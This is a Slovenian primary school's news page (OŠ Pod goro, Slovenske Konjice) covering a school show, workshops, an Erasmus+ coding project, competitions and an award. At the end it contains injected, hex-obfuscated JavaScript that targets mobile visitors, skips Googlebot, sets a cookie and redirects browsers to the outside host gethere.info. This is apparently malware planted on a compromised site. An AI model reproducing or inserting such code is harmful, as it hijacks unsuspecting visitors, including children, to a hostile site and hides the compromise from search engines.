Skoči na glavno vsebino

logo-EkosolaA� A�zdravasA� A�etwinA� A�EU_flag_23LA� A�spitalic1A� A�park1A� A�eplus

OA� Pod goro

A�olska ulica 3
3210 Slovenske Konjice
03 757 29 50

PodruA?nica V parku
03 757 29 75

PodruA?nicaA�OA� A�pitaliA?
03 5763 133

Ledeni žur ogrel več kot 1500 src

Rdeča nit letošnjega tradicionalnega Žura pod goro je bila povezovanje, sprejemanje in sodelovanje. Ledeni žur je združil tako otroke kot starostnike. Po parketu so se namreč z učenci ob glasbi sprehodili tudi stanovalci Lambrechtovega doma. Nastopajoči, stari od 6 do 96 let, so navdušili polno Športno dvorano obiskovalcev. Režirsko taktirko je tokrat prevzela Petra Brdnik Juhart, Ledeni žur je nastal po znani risanki Ledeno kraljestvo, vsak učenec je imel svojo vlogo, našemu povabilu pa se je prijazno odzval orkester 1. Gimnazije Celje, ki je skupaj s šolskim zborom poskrbel za čudovito glasbeno vzdušje.

 

Tudi naša smrečica krasi trg

Učenci prvega triletja so v petek, 14. decembra, okrasili jelko na konjiškem Mestnem trgu pred Domom kulture. Rdeča nit letošnjega okraševanja je bila vlak. Otroci so zelo uživali, saj so za pravo vzdušje poskrbele snežinke, topel čaj in sladko presenečenje.

Tony Cealy ponovno pri nas

Na naše povabilo je Tony Cealy, igralec, režiser, trener ter posredovalec tehnik in strategij Gledališča zatiranih, letos že tretjič obiskal Slovenijo. Na šoli je izvedel 6 delavnic za učence in delavnico za učitelje. Tema delavnic so bile ranljive skupine.
Na šoli se trudimo, da bi učence ozaveščali o ranljivih skupinah (brezdomci, druge narodnosti, invalidi, starejši …). Učenci so v delavnicah aktivno iskali rešitve, kako ranljive skupine opaziti, kako jim pomagati, ugotavljali so, kaj jim preprečuje, da bi jim pomagali in kako te težave premostiti. Veliko so razmišljali, predvsem o tem, kako pomagati drugim, biti bolj empatični, občutljivi za okolico, se zavedati, da je dovolj, če pomagajo vsaj nekomu – obiščejo bolno sosedo, sošolcu razložijo snov …
Tony Cealy je delavnice izvedel še na OŠ Ob Dravinji, v Ločah, Vitanju in Velenju.

ERASMUS+ KA2 projekt “Evropa programira”

POVZETEK PROJEKTA:

V letu 2018, Evropskem letu kulturne dediščine želimo promovirati in se odzvati na spremembe, ki se dogajajo znotraj naše družbe. V projektu Coding Europe si bomo prizadevali za obogatitev vzgoje in izobraževanja z integracijo različnih tematskih področij, kot na primer Evropska kulturna dediščina, robotika, virtualna resničnost in programiranje.

V pouk želimo vpeljati nove metode dela, ki bodo ponudile bolj zanimivo poučevanja za učence, učitelje in celotno šolsko skupnost. Pri delu bomo sledili smernicam Evropskega sveta in upoštevali priporočila programov Evropa 2030 in Agende 2030 za trajnostni razvoj.

V projektu stremimo k doseganju naslednjih ciljev:

  • Razvoj odprtih, motivirajočih in z 21. stoletjem povezanih učnih strategij.
  • Izboljšave Digitalne Agende na področju poučevanja učencev, da bodo postali usposobljeni in odgovorni za lastno učenje ter razumeli načine uporabe interaktivnih virov in orodij, ki so temeljna področja za delovna mesta prihodnosti.
  • Da šole postanejo glasniki vrednot EU in se povežejo s celotno skupnostjo.
  • Doseganje enake stopnje kulturne dediščine znotraj EU, ob uporabi nove tehnologije, vključitvijo inovativnih predlogov s strani učencev ter visokokakovostnimi izobraževalnimi vsebinami, ki bodo dosegljive celotni skupnosti.
  • Naš glavni cilj pa je izboljšava kakovosti poučevanja, da doseže najvišjo stopnjo učinkovitosti in vzgojne vrednosti.

V projektu sodelujejo ustanove iz štirih partnerskih držav: Španije, Nemčije, Italije in Slovenije, ki so bile izbrane na podlagi njihovih zmožnosti za doseganje zgornjih ciljev.

V projekt želimo vključiti več kot 10 000 ljudi (učencev, učiteljev in celotne družbe) in pri tem:

  • izboljšati učno motivacijo učencev,
  • se boriti proti slabemu občutku evropezacije in proti socialni izključenosti,
  • vzpodbujati učne inovacije in vključevati šole v vse obstoječe in prihajajoče aktivnosti v družbi,
  • izboljšati digitalne in sporazumevalne zmožnosti naših učencev in vzgajanje v spoštljive, za učenje odgovorne učence, ki bodo pripravljeni na izzive, ki jih prinaša digitalna doba.

 

 

Glavne aktivnosti projekta:

  • izpopolnjevanje in izdelava avdio-vizualnih vsebin, posnetih v 360° formatu, združljivih z VR očali in pripravljenih za uporabo na kateremkoli računalniku, ki se bodo nanašale na evropsko kulturno dediščino.
  • Programi usposabljanja in monografije o evropski kulturni dediščini, robotiki, umetnosti, varnosti in tveganjih na internetu, robotiki ali programu Avdiovisal Creation 3.0.
  • Združevanje novih tehnologij s tradicionalnimi viri.
  • Uporaba programa Global Teaching programme za doseganje pozitivnega vpliva na učitelje in celotno šolsko skupnost.
  • Mobilnosti učencev in učiteljev ambasadorjev projekta, ki se bodo zavzemali za integracijo, metodološko prenovo in Evropsko unijo.

Učinki projekta, za katere si prizadevamo:

  • Izvedba inovativnega in ustvarjalnega izobraževanja z uvedbo novih, eklektičnih metod.
  • Močnejši občutek pripadnosti EU s poudarjanjem evropskih vrednot, uporabnosti, trdnosti in socialnim vključevanjem.
  • Razvoj najpomembnejši zmožnost kakršni sta učenčeva samostojnost in neodvisnost.

 

V projektu si torej prizadevamo, da bi prispevali k prenovi izobraževanja, preoblikovali, okrepili in izboljšali šole, da postanejo zagovorniki evropskih vrednot in izobraževalne odličnosti.

PODROBNOSTI O MOBILNOSTI UČENCEV IN UČITELJEV

Spletna stran projekta: www.codingeurope.eu

 

 

 

Tekmovanje kot pika na i ob obletnici velikana

K številnim dejavnostim, ki jih obeležujemo v Cankarjevem letu, so danes učenci od 4. – 9. razreda kot piko na i dodali še tekmovanje v znanju slovenščine za Cankarjevo priznanje.
Današnji dan smo na šoli začeli z oddajo po šolskem radiu in tako obeležili stoletnico smrti velikega književnika.

Obisk razstave v praznični Ljubljani

Učenci od 6. do 9. razreda so včeraj, 10. decembra, po pouku odšli v Ljubljano. Na Gospodarskem razstavišču so si ogledali razstavo BODY VITAL, kjer so, tudi s pomočjo delovnih listov, spoznavali prava človeška telesa. Po zanimivi razstavi so se sprehodili po Prešernovem in Kongresnem trgu, kjer so občudovali lučke in praznično okrasitev prestolnice.

S Kity o odgovornosti

3. decembra smo na šoli izvedli Delavnico s terapevtsko psičko Kity, in sicer za šestošolce. Bila je 5 v nizu Delavnic za spodbujanje kreativnosti in kritičnega mišljenja v tem šolskem letu.
Povedale so:
Nikita, Nastja in Blažka: »Bilo je super. Pogovarjali smo se o odgovornosti.«
Lamija: »Zelo mi je bilo všeč, ko smo se pogovarjali o odgovornosti. Najboljše pa je bilo na koncu, ko smo Kity izrekali ukaze in jo za pravilno izveden ukaz tudi nagradili – z briketi.«
Ajda: »Bilo je super, zelo zanimivo in poučno, hkrati pa smo se lahko še malo poigrali s Kity. Naučila sem se, da moram biti odgovorna.«

 

Zlati priznanji v znanju angleščine za Sandy in Luko

19. novembra 2018 je potekalo državno tekmovanje v znanju angleščine za 8. razred, ki so se ga udeležili 3 učenci naše šole: Kiara Gračner, Sandy Cizej in Luka Povalej.
Kiara Gračner je osvojila bronasto priznanje. Domov pa smo prinesli kar dve zlati priznanji v znanju angleščine. Ti sta si prislužila Luka Povalej in Sandy Cizej, ki sta pokazala izjemno znanje angleškega jezika.
Sandy in Luka, iskrene čestitke za vajin uspeh! Čestitke tudi Kiari in mentorici, učiteljici Neli Bejat Krajnc.

Zlata Sandy Cizej, zlati Luka Povalej in bronasta Kiara Gračner

Prejeli Jabolko kakovosti za izjemno mednarodno sodelovanje

Naša šola je s strani CMEPIUSA (Center Republike Slovenije za mobilnost in evropske programe izobraževanja in usposabljanja) prejela nagrado za najbolj izstopajoče zgodbe mednarodnega sodelovanja – JABOLKA KAKOVOSTI 2018.
Že trinajsto leto zapored so jih podelili ustanovam, ki s svojo vpetostjo v mednarodno sodelovanje zagotavljajo doseganje kriterijev kakovosti in ustvarjajo učinke, ki vplivajo na strokovni razvoj izobraževalcev, njihovo povezovanje in oblikovanje timov ter na razvoj samih ustanov, ki v projektih sodelujejo.
Podelili so po 2 nagradi v osnovnošolskem izobraževanju, poklicnem, visokošolskem in v izobraževanju odraslih.

Dogodek je doživel precejšen odziv v medijih. Na spodnjih povezavah si lahko ogledate in prisluhnete nekaterim prispevkom:

Prispevek na RTV Slovenija

Prispevek Novi tednik

Prispevek o dogodku in nagradah v Radijskem dnevniku RTVSLO:

 

 

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dostopnost
//